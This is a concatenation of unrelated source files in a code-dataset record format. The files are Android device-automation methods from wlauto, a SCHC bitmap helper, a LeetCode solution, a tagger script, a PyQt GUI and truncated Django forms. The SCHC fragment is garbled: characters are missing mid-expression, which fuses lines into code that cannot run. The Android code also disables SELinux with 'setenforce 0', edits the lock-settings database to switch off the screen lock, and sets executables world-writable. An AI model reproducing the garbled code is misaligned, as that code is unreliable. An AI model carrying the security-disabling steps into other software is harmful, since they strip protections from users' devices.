def executable_is_installed(self, executable_name): # pylint: disable=unused-argument,no-self-use\n raise AttributeError(\"\"\"Instead of using is_installed, please use\n ``get_binary_path`` or ``install_if_needed`` instead. You should\n use the path returned by these functions to then invoke the binary\n\n please see: https://pythonhosted.org/wlauto/writing_extensions.html\"\"\")\n\n def is_installed(self, name):\n if self.package_is_installed(name):\n return True\n elif \".\" in name: # assumes android packages have a . in their name and binaries documentation\n return False\n else:\n raise AttributeError(\"\"\"Instead of using is_installed, please use\n ``get_binary_path`` or ``install_if_needed`` instead. You should\n use the path returned by these functions to then invoke the binary\n\n please see: https://pythonhosted.org/wlauto/writing_extensions.html\"\"\")\n\n def listdir(self, path, as_root=False, **kwargs):\n contents = self.execute('ls {}'.format(path), as_root=as_root)\n return [x.strip() for x in contents.split()]\n\n def push_file(self, source, dest, as_root=False, timeout=default_timeout): # pylint: disable=W0221\n \"\"\"\n Modified in version 2.1.4: added ``as_root`` parameter.\n\n \"\"\"\n self._check_ready()\n try:\n if not as_root:\n adb_command(self.adb_name, \"push '{}' '{}'\".format(source, dest), timeout=timeout)\n else:\n device_tempfile = self.path.join(self.file_transfer_cache, source.lstrip(self.path.sep))\n self.execute('mkdir -p {}'.format(self.path.dirname(device_tempfile)))\n adb_command(self.adb_name, \"push '{}' '{}'\".format(source, device_tempfile), timeout=timeout)\n self.execute('cp {} {}'.format(device_tempfile, dest), as_root=True)\n except CalledProcessError as e:\n raise DeviceError(e)\n\n def pull_file(self, source, dest, as_root=False, timeout=default_timeout): # pylint: disable=W0221\n \"\"\"\n Modified in version 2.1.4: added ``as_root`` parameter.\n\n \"\"\"\n self._check_ready()\n try:\n if not as_root:\n adb_command(self.adb_name, \"pull '{}' '{}'\".format(source, dest), timeout=timeout)\n else:\n device_tempfile = self.path.join(self.file_transfer_cache, source.lstrip(self.path.sep))\n self.execute('mkdir -p {}'.format(self.path.dirname(device_tempfile)))\n self.execute('cp {} {}'.format(source, device_tempfile), as_root=True)\n adb_command(self.adb_name, \"pull '{}' '{}'\".format(device_tempfile, dest), timeout=timeout)\n except CalledProcessError as e:\n raise DeviceError(e)\n\n def delete_file(self, filepath, as_root=False): # pylint: disable=W0221\n self._check_ready()\n adb_shell(self.adb_name, \"rm -rf '{}'\".format(filepath), as_root=as_root, timeout=self.default_timeout)\n\n def file_exists(self, filepath):\n self._check_ready()\n output = adb_shell(self.adb_name, 'if [ -e \\'{}\\' ]; then echo 1; else echo 0; fi'.format(filepath),\n timeout=self.default_timeout)\n return bool(int(output))\n\n def install(self, filepath, timeout=default_timeout, with_name=None, replace=False): # pylint: disable=W0221\n ext = os.path.splitext(filepath)[1].lower()\n if ext == '.apk':\n return self.install_apk(filepath, timeout, replace)\n else:\n return self.install_executable(filepath, with_name)\n\n def install_apk(self, filepath, timeout=300, replace=False, allow_downgrade=False): # pylint: disable=W0221\n self._check_ready()\n ext = os.path.splitext(filepath)[1].lower()\n if ext == '.apk':\n flags = []\n if replace:\n flags.append('-r') # Replace existing APK\n if allow_downgrade:\n flags.append('-d') # Install the APK even if a newer version is 
already installed\n if self.get_sdk_version() >= 23:\n flags.append('-g') # Grant all runtime permissions\n self.logger.debug(\"Replace APK = {}, ADB flags = '{}'\".format(replace, ' '.join(flags)))\n return adb_command(self.adb_name, \"install {} '{}'\".format(' '.join(flags), filepath), timeout=timeout)\n else:\n raise DeviceError('Can\\'t install {}: unsupported format.'.format(filepath))\n\n def install_executable(self, filepath, with_name=None):\n \"\"\"\n Installs a binary executable on device. Returns\n the path to the installed binary, or ``None`` if the installation has failed.\n Optionally, ``with_name`` parameter may be used to specify a different name under\n which the executable will be installed.\n\n Added in version 2.1.3.\n Updated in version 2.1.5 with ``with_name`` parameter.\n\n \"\"\"\n self._ensure_binaries_directory_is_writable()\n executable_name = with_name or os.path.basename(filepath)\n on_device_file = self.path.join(self.working_directory, executable_name)\n on_device_executable = self.path.join(self.binaries_directory, executable_name)\n self.push_file(filepath, on_device_file)\n self.execute('cp {} {}'.format(on_device_file, on_device_executable), as_root=self.is_rooted)\n self.execute('chmod 0777 {}'.format(on_device_executable), as_root=self.is_rooted)\n return on_device_executable\n\n def uninstall(self, package):\n self._check_ready()\n adb_command(self.adb_name, \"uninstall {}\".format(package), timeout=self.default_timeout)\n\n def uninstall_executable(self, executable_name):\n \"\"\"\n\n Added in version 2.1.3.\n\n \"\"\"\n on_device_executable = self.get_binary_path(executable_name, search_system_binaries=False)\n if not on_device_executable:\n raise DeviceError(\"Could not uninstall {}, binary not found\".format(on_device_executable))\n self._ensure_binaries_directory_is_writable()\n self.delete_file(on_device_executable, as_root=self.is_rooted)\n\n def execute(self, command, timeout=default_timeout, check_exit_code=True, background=False,\n as_root=False, busybox=False, **kwargs):\n \"\"\"\n Execute the specified command on the device using adb.\n\n Parameters:\n\n :param command: The command to be executed. It should appear exactly\n as if you were typing it into a shell.\n :param timeout: Time, in seconds, to wait for adb to return before aborting\n and raising an error. Defaults to ``AndroidDevice.default_timeout``.\n :param check_exit_code: If ``True``, the return code of the command on the Device will\n be check and exception will be raised if it is not 0.\n Defaults to ``True``.\n :param background: If ``True``, will execute adb in a subprocess, and will return\n immediately, not waiting for adb to return. Defaults to ``False``\n :param busybox: If ``True``, will use busybox to execute the command. Defaults to ``False``.\n\n Added in version 2.1.3\n\n .. note:: The device must be rooted to be able to use some busybox features.\n\n :param as_root: If ``True``, will attempt to execute command in privileged mode. The device\n must be rooted, otherwise an error will be raised. 
Defaults to ``False``.\n\n Added in version 2.1.3\n\n :returns: If ``background`` parameter is set to ``True``, the subprocess object will\n be returned; otherwise, the contents of STDOUT from the device will be returned.\n\n :raises: DeviceError if adb timed out or if the command returned non-zero exit\n code on the device, or if attempting to execute a command in privileged mode on an\n unrooted device.\n\n \"\"\"\n self._check_ready()\n if as_root and not self.is_rooted:\n raise DeviceError('Attempting to execute \"{}\" as root on unrooted device.'.format(command))\n if busybox:\n command = ' '.join([self.busybox, command])\n if background:\n return adb_background_shell(self.adb_name, command, as_root=as_root)\n else:\n return adb_shell(self.adb_name, command, timeout, check_exit_code, as_root)\n\n def kick_off(self, command, as_root=None):\n \"\"\"\n Like execute but closes adb session and returns immediately, leaving the command running on the\n device (this is different from execute(background=True) which keeps adb connection open and returns\n a subprocess object).\n\n Added in version 2.1.4\n\n \"\"\"\n if as_root is None:\n as_root = self.is_rooted\n try:\n command = 'cd {} && {} nohup {}'.format(self.working_directory, self.busybox, command)\n output = self.execute(command, timeout=1, as_root=as_root)\n except TimeoutError:\n pass\n else:\n raise ValueError('Background command exited before timeout; got \"{}\"'.format(output))\n\n def get_pids_of(self, process_name):\n \"\"\"Returns a list of PIDs of all processes with the specified name.\"\"\"\n result = (self.execute('ps | {} grep {}'.format(self.busybox, process_name),\n check_exit_code=False) or '').strip()\n if result and 'not found' not in result:\n return [int(x.split()[1]) for x in result.split('\\n')]\n else:\n return []\n\n def ps(self, **kwargs):\n \"\"\"\n Returns the list of running processes on the device. Keyword arguments may\n be used to specify simple filters for columns.\n\n Added in version 2.1.4\n\n \"\"\"\n lines = iter(convert_new_lines(self.execute('ps')).split('\\n'))\n lines.next() # header\n result = []\n for line in lines:\n parts = line.split()\n if parts:\n result.append(PsEntry(*(parts[0:1] + map(int, parts[1:5]) + parts[5:])))\n if not kwargs:\n return result\n else:\n filtered_result = []\n for entry in result:\n if all(getattr(entry, k) == v for k, v in kwargs.iteritems()):\n filtered_result.append(entry)\n return filtered_result\n\n def get_properties(self, context):\n \"\"\"Captures and saves the information from /system/build.prop and /proc/version\"\"\"\n props = super(AndroidDevice, self).get_properties(context)\n props.update(self._get_android_properties(context))\n return props\n\n def _get_android_properties(self, context):\n props = {}\n props['android_id'] = self.get_android_id()\n self._update_build_properties(props)\n\n dumpsys_host_file = os.path.join(context.host_working_directory, 'window.dumpsys')\n with open(dumpsys_host_file, 'w') as wfh:\n wfh.write(self.execute('dumpsys window'))\n context.add_run_artifact('dumpsys_window', dumpsys_host_file, 'meta')\n\n prop_file = os.path.join(context.host_working_directory, 'android-props.json')\n with open(prop_file, 'w') as wfh:\n json.dump(props, wfh)\n context.add_run_artifact('android_properties', prop_file, 'export')\n return props\n\n def getprop(self, prop=None):\n \"\"\"Returns parsed output of Android getprop command. 
If a property is\n specified, only the value for that property will be returned (with\n ``None`` returned if the property doesn't exist. Otherwise,\n ``wlauto.utils.android.AndroidProperties`` will be returned, which is\n a dict-like object.\"\"\"\n props = AndroidProperties(self.execute('getprop'))\n if prop:\n return props[prop]\n return props\n\n def deploy_sqlite3(self, context):\n host_file = context.resolver.get(Executable(NO_ONE, self.abi, 'sqlite3'))\n target_file = self.install_if_needed(host_file)\n return target_file\n\n # Android-specific methods. These either rely on specifics of adb or other\n # Android-only concepts in their interface and/or implementation.\n\n def forward_port(self, from_port, to_port):\n \"\"\"\n Forward a port on the device to a port on localhost.\n\n :param from_port: Port on the device which to forward.\n :param to_port: Port on the localhost to which the device port will be forwarded.\n\n Ports should be specified using adb spec. See the \"adb forward\" section in \"adb help\".\n\n \"\"\"\n adb_command(self.adb_name, 'forward {} {}'.format(from_port, to_port), timeout=self.default_timeout)\n\n def dump_logcat(self, outfile, filter_spec=None):\n \"\"\"\n Dump the contents of logcat, for the specified filter spec to the\n specified output file.\n See http://developer.android.com/tools/help/logcat.html\n\n :param outfile: Output file on the host into which the contents of the\n log will be written.\n :param filter_spec: Logcat filter specification.\n see http://developer.android.com/tools/debugging/debugging-log.html#filteringOutput\n\n \"\"\"\n if self._logcat_poller:\n return self._logcat_poller.write_log(outfile)\n else:\n if filter_spec:\n command = 'logcat -d -s {} > {}'.format(filter_spec, outfile)\n else:\n command = 'logcat -d > {}'.format(outfile)\n return adb_command(self.adb_name, command, timeout=self.default_timeout)\n\n def clear_logcat(self):\n \"\"\"Clear (flush) logcat log.\"\"\"\n if self._logcat_poller:\n return self._logcat_poller.clear_buffer()\n else:\n return adb_shell(self.adb_name, 'logcat -c', timeout=self.default_timeout)\n\n def get_screen_size(self):\n output = self.execute('dumpsys window')\n match = SCREEN_SIZE_REGEX.search(output)\n if match:\n return (int(match.group('width')),\n int(match.group('height')))\n else:\n return (0, 0)\n\n def perform_unlock_swipe(self):\n width, height = self.get_screen_size()\n command = 'input swipe {} {} {} {}'\n if self.swipe_to_unlock == \"horizontal\":\n swipe_heigh = height * 2 // 3\n start = 100\n stop = width - start\n self.execute(command.format(start, swipe_heigh, stop, swipe_heigh))\n if self.swipe_to_unlock == \"vertical\":\n swipe_middle = height / 2\n swipe_heigh = height * 2 // 3\n self.execute(command.format(swipe_middle, swipe_heigh, swipe_middle, 0))\n else: # Should never reach here\n raise DeviceError(\"Invalid swipe direction: {}\".format(self.swipe_to_unlock))\n\n def capture_screen(self, filepath):\n \"\"\"Caputers the current device screen into the specified file in a PNG format.\"\"\"\n on_device_file = self.path.join(self.working_directory, 'screen_capture.png')\n self.execute('screencap -p {}'.format(on_device_file))\n self.pull_file(on_device_file, filepath)\n self.delete_file(on_device_file)\n\n def capture_ui_hierarchy(self, filepath):\n \"\"\"Captures the current view hierarchy into the specified file in a XML format.\"\"\"\n on_device_file = self.path.join(self.working_directory, 'screen_capture.xml')\n self.execute('uiautomator dump 
{}'.format(on_device_file))\n self.pull_file(on_device_file, filepath)\n self.delete_file(on_device_file)\n\n parsed_xml = xml.dom.minidom.parse(filepath)\n with open(filepath, 'w') as f:\n f.write(parsed_xml.toprettyxml())\n\n def is_screen_on(self):\n \"\"\"Returns ``True`` if the device screen is currently on, ``False`` otherwise.\"\"\"\n output = self.execute('dumpsys power')\n match = SCREEN_STATE_REGEX.search(output)\n if match:\n return boolean(match.group(1))\n else:\n raise DeviceError('Could not establish screen state.')\n\n def ensure_screen_is_on(self):\n if not self.is_screen_on():\n self.execute('input keyevent 26')\n if self.swipe_to_unlock:\n self.perform_unlock_swipe()\n\n def disable_screen_lock(self):\n \"\"\"\n Attempts to disable he screen lock on the device.\n\n .. note:: This does not always work...\n\n Added inversion 2.1.4\n\n \"\"\"\n lockdb = '/data/system/locksettings.db'\n sqlcommand = \"update locksettings set value='0' where name='screenlock.disabled';\"\n f = tempfile.NamedTemporaryFile()\n try:\n f.write('{} {} \"{}\"'.format(self.sqlite, lockdb, sqlcommand))\n f.flush()\n on_device_executable = self.install_executable(f.name,\n with_name=\"disable_screen_lock\")\n finally:\n f.close()\n self.execute(on_device_executable, as_root=True)\n\n def disable_selinux(self):\n # This may be invoked from intialize() so we can't use execute() or the\n # standard API for doing this.\n api_level = int(adb_shell(self.adb_name, 'getprop ro.build.version.sdk',\n timeout=self.default_timeout).strip())\n # SELinux was added in Android 4.3 (API level 18). Trying to\n # 'getenforce' in earlier versions will produce an error.\n if api_level >= 18:\n se_status = self.execute('getenforce', as_root=True).strip()\n if se_status == 'Enforcing':\n self.execute('setenforce 0', as_root=True)\n\n def get_device_model(self):\n try:\n return self.getprop(prop='ro.product.device')\n except KeyError:\n return None\n\n def refresh_device_files(self, file_list):\n \"\"\"\n Depending on the devices android version and root status, determine the\n appropriate method of forcing a re-index of the mediaserver cache for a given\n list of files.\n \"\"\"\n if self.device.is_rooted or self.device.get_sdk_version() < 24: # MM and below\n common_path = commonprefix(file_list, sep=self.device.path.sep)\n self.broadcast_media_mounted(common_path, self.device.is_rooted)\n else:\n for f in file_list:\n self.broadcast_media_scan_file(f)\n\n def broadcast_media_scan_file(self, filepath):\n \"\"\"\n Force a re-index of the mediaserver cache for the specified file.\n \"\"\"\n command = 'am broadcast -a android.intent.action.MEDIA_SCANNER_SCAN_FILE -d file://'\n self.execute(command + filepath)\n\n def broadcast_media_mounted(self, dirpath, as_root=False):\n \"\"\"\n Force a re-index of the mediaserver cache for the specified directory.\n \"\"\"\n command = 'am broadcast -a android.intent.action.MEDIA_MOUNTED -d file://'\n self.execute(command + dirpath, as_root=as_root)\n\n # Internal methods: do not use outside of the class.\n def _update_build_properties(self, props):\n try:\n regex = re.compile(r'\\[([^\\]]+)\\]\\s*:\\s*\\[([^\\]]+)\\]')\n for match in regex.finditer(self.execute(\"getprop\")):\n key = match.group(1).strip()\n value = match.group(2).strip()\n props[key] = value\n except ValueError:\n self.logger.warning('Could not parse build.prop.')\n\n def _update_versions(self, filepath, props):\n with open(filepath) as fh:\n text = fh.read()\n props['version'] = text\n text = re.sub(r'#.*', '', 
text).strip()\n match = re.search(r'^(Linux version .*?)\\s*\\((gcc version .*)\\)$', text)\n if match:\n props['linux_version'] = match.group(1).strip()\n props['gcc_version'] = match.group(2).strip()\n else:\n self.logger.warning('Could not parse version string.')\n\n def _ensure_binaries_directory_is_writable(self):\n matched = []\n for entry in self.list_file_systems():\n if self.binaries_directory.rstrip('/').startswith(entry.mount_point):\n matched.append(entry)\n if matched:\n entry = sorted(matched, key=lambda x: len(x.mount_point))[-1]\n if 'rw' not in entry.options:\n self.execute('mount -o rw,remount {} {}'.format(entry.device, entry.mount_point), as_root=True)\n else:\n raise DeviceError('Could not find mount point for binaries directory {}'.format(self.binaries_directory))\n\n\nclass _LogcatPoller(threading.Thread):\n\n join_timeout = 5\n\n def __init__(self, device, period, timeout=None):\n super(_LogcatPoller, self).__init__()\n self.adb_device = device.adb_name\n self.logger = device.logger\n self.period = period\n self.timeout = timeout\n self.stop_signal = threading.Event()\n self.lock = threading.RLock()\n self.buffer_file = tempfile.mktemp()\n self.last_poll = 0\n self.daemon = True\n self.exc = None\n\n def run(self):\n self.logger.debug('Starting logcat polling.')\n try:\n while True:\n if self.stop_signal.is_set():\n break\n with self.lock:\n current_time = time.time()\n if (current_time - self.last_poll) >= self.period:\n self._poll()\n time.sleep(0.5)\n except Exception: # pylint: disable=W0703\n self.exc = WorkerThreadError(self.name, sys.exc_info())\n self.logger.debug('Logcat polling stopped.')\n\n def stop(self):\n self.logger.debug('Stopping logcat polling.')\n self.stop_signal.set()\n self.join(self.join_timeout)\n if self.is_alive():\n self.logger.error('Could not join logcat poller thread.')\n if self.exc:\n raise self.exc # pylint: disable=E0702\n\n def clear_buffer(self):\n self.logger.debug('Clearing logcat buffer.')\n with self.lock:\n adb_shell(self.adb_device, 'logcat -c', timeout=self.timeout)\n with open(self.buffer_file, 'w') as _: # NOQA\n pass\n\n def write_log(self, outfile):\n self.logger.debug('Writing logbuffer to {}.'.format(outfile))\n with self.lock:\n self._poll()\n if os.path.isfile(self.buffer_file):\n shutil.copy(self.buffer_file, outfile)\n else: # there was no logcat trace at this time\n with open(outfile, 'w') as _: # NOQA\n pass\n\n def close(self):\n self.logger.debug('Closing logcat poller.')\n if os.path.isfile(self.buffer_file):\n os.remove(self.buffer_file)\n\n def _poll(self):\n with self.lock:\n self.last_poll = time.time()\n adb_command(self.adb_device, 'logcat -d >> {}'.format(self.buffer_file), timeout=self.timeout)\n adb_command(self.adb_device, 'logcat -c', timeout=self.timeout)\n\n\nclass BigLittleDevice(AndroidDevice): # pylint: disable=W0223\n\n parameters = [\n Parameter('scheduler', default='hmp', override=True),\n ]\n","sub_path":"wlauto/common/android/device.py","file_name":"device.py","file_ext":"py","file_size_in_byte":35720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"51264981","text":"#---------------------------------------------------------------------------\n\nfrom base_import import *\n\nimport schcmsg\n\n#---------------------------------------------------------------------------\n\nall1 = lambda N: (1< 0:\n bl.append(0)\n tni -= 1\n if nbt == 1:\n bl.append(1)\n break\n # regular\n if wni < wn:\n #print(\"MBL00 wn:tn:nb=\", wni, tni, bl)\n 
while wni < wn:\n bl = bit_list.setdefault(wni, [])\n while tni > 0:\n bl.append(0)\n tni -= 1\n bl.append(0)\n wni += 1\n tni = max_fcn\n #print(\"MBL01 wn:tn:nb=\", wni, tni, bl)\n #print(\"MBL1 nb=\", nbt)\n assert wni == wn\n bl = bit_list.setdefault(wni, [])\n while tni > tn:\n bl.append(0)\n tni -= 1\n #print(\"MBL2 wn:tn:nb=\", wni, tni, bl)\n for _ in range(nbt):\n bl.append(1)\n if tni == 0:\n #print(\"MBL3 wn:tn:nb=\", wni, tni, bl)\n wni += 1\n bl = bit_list.setdefault(wni, [])\n tni = max_fcn\n else:\n #print(\"MBL4 wn:tn:nb=\", wni, tni, bl)\n tni -= 1\n return bit_list\n\n#---------------------------------------------------------------------------\n\ndef find_missing_tiles(tile_list, N, window_size):\n \"\"\" find missing tiles in the tile_list.\n return the set of bitmaps for each window in which any tiles are missing.\n the bitmap is transformed into BitBuffer like below.\n [\n (0, BitBuffer([1, 1, 1, 1, 1, 1, 0])),\n (2, BitBuffer([1, 1, 1, 0, 0, 0, 1])),\n ]\n In this example, the bitmap will be \"1110001\".\n \"\"\"\n bit_list = make_bit_list(tile_list, N, window_size)\n ret = []\n for i in sorted(bit_list.items()):\n if not all(i[1]):\n ret.append((i[0], BitBuffer(i[1])))\n return ret\n\n#---------------------------------------------------------------------------\n","sub_path":"schcbitmap.py","file_name":"schcbitmap.py","file_ext":"py","file_size_in_byte":3678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"523899714","text":"class Solution(object):\n def lengthOfLongestSubstring(self, s):\n \"\"\"\n :type s: str\n :rtype: int\n \"\"\"\n start = 0\n visited = dict()\n maxlen = 0\n\n for i, c in enumerate(s):\n if visited.get(c, -1) >= start:\n curlen = i - start\n if curlen > maxlen:\n maxlen = curlen\n start = visited[c] + 1\n visited[c] = i\n\n if len(s) - start > maxlen:\n maxlen = len(s) - start\n\n return maxlen\n","sub_path":"Python/003_LongestSubstringWithoutRepeatingCharacters/Oct26.py","file_name":"Oct26.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"462249718","text":"from assignment_1.tiger_corpus_reader import TigerCorpusReader\nfrom assignment_3.max_ent_tagger import MaxEntTagger\n\nimport os\nimport pickle\n\n\nDATA_DIR = 'C:\\\\Users\\\\ttanj\\\\PycharmProjects\\\\SNLP\\\\data'\nCORPUS_NAME = 'tiger_release_dec05.xml'\n\nalpha = 0.05\nbatch_size = 100\nepochs = 10\n\nif os.path.exists(os.path.join(DATA_DIR, 'tiger_release_dec05')):\n with open(os.path.join(DATA_DIR, 'tiger_release_dec05'), 'rb') as fh:\n corpus = pickle.load(fh)\n reader = TigerCorpusReader(corpus)\nelse:\n reader = TigerCorpusReader()\n reader.read(os.path.join(DATA_DIR, CORPUS_NAME))\n\ntrain = reader.get_sentences(0, 44999)\ndev = reader.get_sentences(45000, 45010)\n\ntagger = MaxEntTagger()\ntagger.train(train, dev, alpha, batch_size, epochs)\n","sub_path":"assignment_3/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"181584793","text":"from PyQt5.QtWidgets import (QApplication, QMenu, QColorDialog, QGridLayout, QVBoxLayout, QHBoxLayout, QDialog, QLabel,\n QLineEdit, QPushButton, QWidget, QRadioButton, QSpinBox, QCheckBox, QButtonGroup,QTabWidget,\n QErrorMessage,QMenuBar)\nfrom PyQt5.QtCore import (Qt)\nimport sys,os, json\n\nconfig_file = 'dataAcc_config.json'\n\nclass BasicInstance:\n def 
__init__(self,name='',data={'':''}):\n self.name = name\n self.data = data\n self.ui = self.Widget(data=self)\n\n class Widget(QWidget):\n def __init__(self,data=None,parent=None):\n super().__init__()\n self.data = data\n self.setLayout(QHBoxLayout())\n self.drawUI()\n\n def drawUI(self):\n print('draw')\n layout = self.layout()\n self.label_btn = QPushButton(self.data.name)\n self.label_btn.setMaximumWidth(60)\n self.label_btn.setMinimumWidth(60)\n self.label_btn.clicked.connect(lambda :self.ChangeInstance(parent=self))\n layout.addWidget(self.label_btn)\n\n for key, val in sorted(self.data.data.items()):\n lbl = QLabel(key)\n lbl.setAlignment(Qt.AlignCenter)\n lbl.setMaximumWidth(20)\n lbl.setMinimumWidth(20)\n layout.addWidget(lbl)\n l = QLineEdit(val)\n l.editingFinished.connect(self.dataChanged)\n l.setMaximumWidth(40)\n l.setMinimumWidth(40)\n layout.addWidget(l)\n layout.setAlignment(Qt.AlignLeft)\n # layout.addStretch(1)\n # self.setLayout(layout)\n # self.show()\n\n class ChangeInstance(QDialog):\n def __init__(self, parent=None):\n self.parent = parent\n super().__init__(parent)\n self.setLayout(QVBoxLayout())\n self.initUI()\n self.show()\n\n def initUI(self):\n layout = self.layout()\n self.name = QLineEdit(self.parent.data.name)\n layout.addWidget(self.name)\n self.keys = QLineEdit(' '.join(self.parent.data.data))\n layout.addWidget(self.keys)\n self.OkBtn = QPushButton('Ok')\n self.OkBtn.clicked.connect(self.okBtnPressed)\n layout.addWidget(self.OkBtn)\n # self.setLayout(layout)\n\n def okBtnPressed(self):\n print('okBtnPressed')\n self.parent.data.name = self.name.text()\n self.parent.data.data = {key:self.parent.data.data.get(key,'') for key in self.keys.text().strip().split()}\n self.parent.smthChanged()\n self.close()\n\n def smthChanged(self):\n # print('labelBtnClicked')\n # self.ChangeInstance(parent=self)\n while self.layout().count():\n item = self.layout().takeAt(0)\n item.widget().deleteLater()\n self.drawUI()\n self.parent().saveConfig()\n\n def dataChanged(self):\n layout = self.layout()\n i = layout.indexOf(self.sender())\n key = sorted(self.data.data)[i//2-1]\n print(key,self.sender().text())\n self.data.data[key]=self.sender().text()\n self.parent().saveConfig()\n\nclass DataPage(QWidget):\n def __init__(self,name,data,parent=None):\n self.parent = parent\n self.name = name\n self.data=[]\n for key in data:\n self.data.append(BasicInstance(name=key,data=data[key]))\n super().__init__()\n self.setLayout(QGridLayout())\n self.drawUI()\n self.show()\n\n def drawUI(self):\n # clear layout for further drawing\n layout = self.layout()\n while layout.count():\n item = layout.takeAt(0)\n item.widget().deleteLater()\n for i,item in enumerate(self.data):\n print(i, item.name)\n layout.addWidget(item.Widget(data=item),i,0)\n delBtn = QPushButton('Del')\n delBtn.pressed.connect(self.delSubEntry)\n layout.addWidget(delBtn,i,1)\n addBtn = QPushButton('Add')\n addBtn.pressed.connect(self.addBtnPressed)\n layout.addWidget(addBtn,len(self.data),0)\n w = QWidget()\n w.setLayout(QVBoxLayout())\n w.layout().addStretch(1)\n layout.addWidget(w, len(self.data)+1, 0)\n\n def delSubEntry(self):\n print('delSubEntry')\n layout = self.layout()\n i = layout.indexOf(self.sender())//2\n # layout = self.layout()\n # item = layout.takeAt(2*i)\n # item.widget().deleteLater()\n # item = layout.takeAt(2*i)\n # item.widget().deleteLater()\n del self.data[i]\n self.drawUI()\n self.saveConfig()\n\n def saveConfig(self):\n # print(self.parent())\n self.parent.saveConfig()\n\n def 
addBtnPressed(self):\n print('addBtnPressed')\n self.data.append(BasicInstance())\n self.drawUI()\n\n def getDataToConfig(self):\n d = {}\n for item in self.data:\n d[item.name]=item.data\n return {self.name:d}\n\nclass DataAccumulator(QTabWidget):\n def __init__(self):\n self.pages = []\n self.load()\n # self.data = {'mag':{'HH':{'I':'12'},'AHH':{'B':'4'},'gf':{'I':'10'}}}\n super().__init__()\n self.initUI()\n\n def load(self):\n if not os.path.exists(config_file):\n print('creating config file ', config_file)\n self.data = {}\n with open(config_file, 'w') as f:\n json.dump(self.data, f)\n else:\n with open(config_file, 'r') as f:\n print('config_load')\n self.data = json.load(f)\n\n def saveConfig(self):\n print('saveConfig')\n d = {}\n for i in range(self.count()):\n d.update(self.widget(i).getDataToConfig())\n print(d)\n with open(config_file, 'w') as f:\n json.dump(d, f)\n\n\n def initUI(self):\n # menu_bar = QMenuBar()\n # new_page_menu = QMenu('Pages')\n # menu_bar.addMenu(new_page_menu)\n # new_page_menu.addAction('New page')\n # self.layout().setMenuBar(menu_bar)\n for key in self.data:\n new_page = DataPage(name=key,data=self.data[key],parent=self)\n self.addTab(new_page,key)\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n # ex = BasicInstance('new',{'1':'sdf'})\n ex = DataAccumulator()\n ex.show()\n sys.exit(app.exec_())","sub_path":"Thulium/dataAccumulator.py","file_name":"dataAccumulator.py","file_ext":"py","file_size_in_byte":6651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"357959435","text":"from .. import models \nfrom django.forms import ModelForm\nfrom django import forms\n#from django.forms.widgets import *\n#from django.forms.extras.widgets import *\n\n\nclass CalculationGroupsForm(ModelForm):\n class Meta:\n model = models.CalculationGroups\n exclude = (\"calc_group_id\", )\n \nclass ElementsForm(ModelForm): \n class Meta:\n model = models.Elements\n\nclass GeometriesForm(ModelForm):\n class Meta:\n model = models.Geometries\n exclude = (\"geom_id\", )\n \nclass MolecularSpeciesForm(ModelForm):\n time_stamp = forms.DateTimeField(required=False)\n comments = forms.CharField(required=False)\n class Meta:\n model = models.MolecularSpecies\n exclude = (\"species_id\", )\n\n\n \nclass PartialMolecularSpeciesForm(ModelForm):\n class Meta:\n model = models.MolecularSpecies\n exclude = (\"species_id\", \"time_stamp\", \"qual_index\", )\n \nclass TheoryLevelsForm(ModelForm):\n description = forms.CharField()\n time_stamp = forms.DateTimeField(required=False)\n comments = forms.CharField(required=False)\n xc_description = forms.CharField(required=False, widget=forms.TextInput(attrs={'size':'40'}))\n bibliographies = forms.ModelMultipleChoiceField(queryset=models.Bibliography.alive_objects.all(), required = False)\n class Meta:\n model = models.TheoryLevels\n exclude = (\"thlevel_id\", )\n \nclass ChemistryCodesForm(ModelForm):\n description = forms.CharField(required=False)\n time_stamp = forms.DateTimeField(required=False)\n comments = forms.CharField(required=False)\n bibliographies = forms.ModelMultipleChoiceField(queryset=models.Bibliography.alive_objects.all(), required = False)\n class Meta:\n model = models.ChemistryCodes\n exclude = (\"code_id\", )\n \n\nclass CalculationsForm(ModelForm):\n input_md5 = forms.CharField(required = False, widget=forms.TextInput(attrs={'size':'40'}))\n output_md5 = forms.CharField(required = False, widget=forms.TextInput(attrs={'size':'40'}))\n other_output_md5 = 
forms.CharField(required = False, widget=forms.TextInput(attrs={'size':'40'}))\n time_stamp = forms.DateTimeField(required=False)\n comments = forms.CharField(required=False)\n class Meta:\n model = models.Calculations\n exclude = (\"calc_id\", \"code\",)\n \n \nclass BasisSetsForm(ModelForm):\n name = forms.CharField(required=False) #REMOVE required=False\n description = forms.CharField(required=False)\n time_stamp = forms.DateTimeField(required=False)\n comments = forms.CharField(required=False)\n bibliographies = forms.ModelMultipleChoiceField(queryset=models.Bibliography.alive_objects.all(), required = False)\n class Meta:\n model = models.BasisSets\n exclude = (\"basisset_id\", )\n \nclass TasksForm(ModelForm):\n description = forms.CharField()\n comments = forms.CharField(required=False)\n class Meta:\n model = models.Tasks\n exclude = (\"task_id\", \"thlevel\", \"calc\", )\n \nclass ElectonicStatesForm(ModelForm):\n bibliographies = forms.ModelMultipleChoiceField(queryset=models.Bibliography.alive_objects.all(), required = False)\n class Meta:\n model = models.ElectronicStates\n exclude = (\"state_id\", \"species\", \"geom\", \"task\", )\n \nclass DipoleMomentsForm(ModelForm):\n bibliographies = forms.ModelMultipleChoiceField(queryset=models.Bibliography.alive_objects.all(), required = False)\n class Meta:\n model = models.DipoleMoments\n exclude = (\"dip_id\", \"state\", \"task\", )\n \nclass ElementSpeciesForm(ModelForm):\n class Meta:\n model = models.ElementSpecies\n exclude = (\"elem_species_id\", \"element\", \"species\",)\n \nclass VibrationalAnalysesArmonicForm(ModelForm):\n polimode = forms.CharField(required=False)\n time_stamp = forms.DateTimeField(required=False)\n comments = forms.CharField(required=False)\n bibliographies = forms.ModelMultipleChoiceField(queryset=models.Bibliography.alive_objects.all(), required = False)\n class Meta:\n model = models.VibrationalAnalysesArmonic\n exclude = (\"vibalnalysis_id\", \"state\",\"task\",)\n\nclass RotationalConstantsForm(ModelForm):\n time_stamp 